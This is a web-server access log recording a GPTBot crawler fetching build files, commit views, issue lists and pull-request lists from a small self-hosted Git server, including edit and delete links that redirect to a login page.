AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18926] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11639] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18936] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18937] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16433] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 44086] [Gzip 15.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 70856] [Gzip 17.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 69302] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18937] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11634] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18927] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11390] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11416] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:18:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15431] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:18:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11716] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" +[17/Feb/2026:18:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 11124] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15546] [Gzip 6.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10117] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13553] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:18:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&state=closed&type=all" +[17/Feb/2026:18:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:33:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:18:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:18:34:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:34:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:18:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:18:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11234] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:18:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 914] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:18:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13822] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 921] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13573] [Gzip 4.31] [Sent-to 192.168.0.250] 